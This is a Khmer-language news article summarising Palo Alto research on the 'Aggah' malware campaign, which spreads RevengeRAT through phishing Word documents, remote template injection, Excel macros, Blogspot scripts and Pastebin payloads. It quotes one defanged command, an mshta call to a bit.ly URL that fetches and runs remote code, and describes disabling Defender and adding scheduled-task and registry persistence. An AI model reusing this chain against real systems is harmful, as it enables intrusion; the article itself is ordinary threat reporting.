យុទ្ធនាការវាយលុកថ្មីរបស់មេរោគមានឈ្មោះថា “Aggah” ផ្តោតលើប្រទេសផ្សេងៗតាមរយៈឯកសារមេរោគ ហើយវាឆ្លងទៅជនរងគ្រោះតាមរយៈការទម្លាក់មេរោគ RevengeRAT ពី Pastebin។ ក្រុមអ្នកស្រាវជ្រាវមកពី Palo Alto ថ្មីៗសង្កេតមើលយុទ្ធនាការពពួកមេរោគដ៏ធំបំផុតតាមរយៈ telemetry ហើយពួកគេបានដាក់ឈ្មោះថា Aggah ដោយផ្អែកលើឈ្មោះក្លែងក្លាយ “Hagga” ។
តួអង្គគំរាមកំហែងនៅពីក្រោយយុទ្ធនាការនេះប្រើ RevengeRAT ចូលតាមសាធារណៈ ដោយអាចដំណើរការពីចម្ងាយដែលមានដំណើរនៅគ្រប់ទីកន្លែងក្នុងប្រភពបើកចំហ។ អ្នកវាយប្រហារកំណត់គោលដៅលើអង្គការនានាក្នុងប្រទេសមជ្ឈឹមបូព៌ា, បណ្តាប្រទេសដែលមានមូលដ្ឋាននៅសហរដ្ឋអាមេរិក អឺរ៉ុប និងអាស៊ីដើម្បីកំណត់មុខជំនួញដូចជាបច្ចេកវិទ្យាលក់រាយ ការផលិត រដ្ឋ / រដ្ឋាភិបាលក្នុងតំបន់ បដិសណ្ឋារកិច្ច វេជ្ជសាស្ត្របច្ចេកវិទ្យា និងអាជីវកម្ម វិជ្ជាជីវៈផ្សេងទៀត។
Aggah Malware យុទ្ធនាការចម្លងមេរោគ Aggah
ជាទូទៅ មេរោគ Aggah ចែកចាយឯកសារមានគ្រោះថ្នាក់តាមរយៈអ៊ីម៉ែលក្លែងក្លាយដែលមានអ៊ីម៉ែលស្របច្បាប់ពីស្ថាប័នហិរញ្ញវត្ថុធំមួយនៅមជ្ឈឹមបូព៌ា។ នៅពេលដែលអ្នកប្រើចុចលើឯកសារWord ភ្ជាប់ជាមួយឈ្មោះឯកសារ “Activity.doc” វាប៉ុនប៉ងផ្ទុកឯកសារ OLE ពីចម្ងាយតាមរយៈការចាក់បញ្ចូល Template។ ដូចគ្នានេះផងដែរ ឯកសារមេរោគបោក បញ្ឆោតឱ្យអ្នកបើកដំណើរការមាតិកាដើម្បីដំណើរការម៉ាក្រូនិងបង្ខំអ្នកប្រើឱ្យបើកតែឯកសារ Microsoft Word តែប៉ុណ្នោះ។ ក្រោយមក ឯកសារ OLE ផ្ទុកឯកសារ Excel ផ្សេងទៀត ដែលមានម៉ាក្រូមិនច្បាស់លាស់ ដែលត្រូវឌីកូដ និងប្រតិបត្តិ URL ដូចខាងក្រោមតាមរយៈ ពាក្យបញ្ជា “Shell” ៖ mshta hxxp://www.bitly[.]com/SmexEaldos3។ នៅពេលដែលពាក្យ បញ្ជាត្រូវគេប្រតិបត្តិ ជនរងគ្រោះប្ដូរទៅប្លុកដែលបង្ហោះលើ blogspot [។ ] com រួមបញ្ចូល JavaScript ដែលបង្កប់សកម្មភាពជាច្រើនរួមទាំងការប៉ុនប៉ងរបស់ខ្លួនដើម្បីបញ្ឈប់ដំណើរការរបស់ Microsoft Defender ដោយលុបសំណុំសញ្ញារបស់ខ្លួន។ យោងតាមការស្រាវជ្រាវ Palo Alto, ស្គ្រីបដែលបង្ហោះនៅលើ Blogspotបន្ទាប់មកអនុវត្តសកម្មភាពសំខាន់ៗចំនួនបីដែលរួមមាន:
- ទាញយក payload ពី Pastebin URL
- បង្កើតតារាងពេលវេលាសកម្មភាពដែលមានផ្ទុក និងដំណើរការស្គ្រីបពី Pastebin URL
- បង្កើត registry ដោយស្វ័យប្រវត្តិ ដើម្បីផ្ទុក និងដំណើរការស្គ្រីបពី Pastebin URL
ស្គ្រីបមេរោគឆ្លងនៅ Blogspot ដោយប្រើ URLដើម្បីផ្ទុក payload និងផ្តាច់ផ្ទេរ។
ការវិភាគបន្ថែមទៀតបានបង្ហាញថាការចំណាយត្រូវបានសរសេរជាភាសា។ ណេតនិងដាក់ឈ្មោះថា “ការផ្ទុះនុយក្លេអ៊ែរ” ដែលជាវ៉ារ្យ៉ង់នៃ RevengeRAT ។ ស្គ្រីបដែលបង្ហោះនៅប្លុក Blogspot បង្កើតពាក្យបញ្ជាផ្សេងទៀតដើម្បីបង្កើតការងារដែលកំណត់ពេលដែលមានឈ្មោះថា “eScan Backup” ដែលរត់គ្រប់ ១០០ នាទី។”RevengeRAT គឺជាមេរោគ Trojans លេចធ្លាយជាច្រើនដែលមាននៅក្នុងប្រភពបើកចំហរដែលធ្វើឱ្យមានការប្រើប្រាស់មេរោគ និងកកើតជាការវាយប្រហារពិបាក។ ” “ដើម្បីបង្កើតមេរោគ RevengeRAT ដែលប្រើ ក្នុងយុទ្ធនាការនេះ ភ្នាក់ងារនឹងប្រើ RevengeRAT ម៉ាស៊ីនបម្រើដើម្បីចងក្រងនូវការប្រតិបត្តិដែលកំណត់រចនាសម្ព័ន្ធជាមួយបរិបទត្រឹមត្រូវ។ ”



ប្រភពព័ត៌មាន៖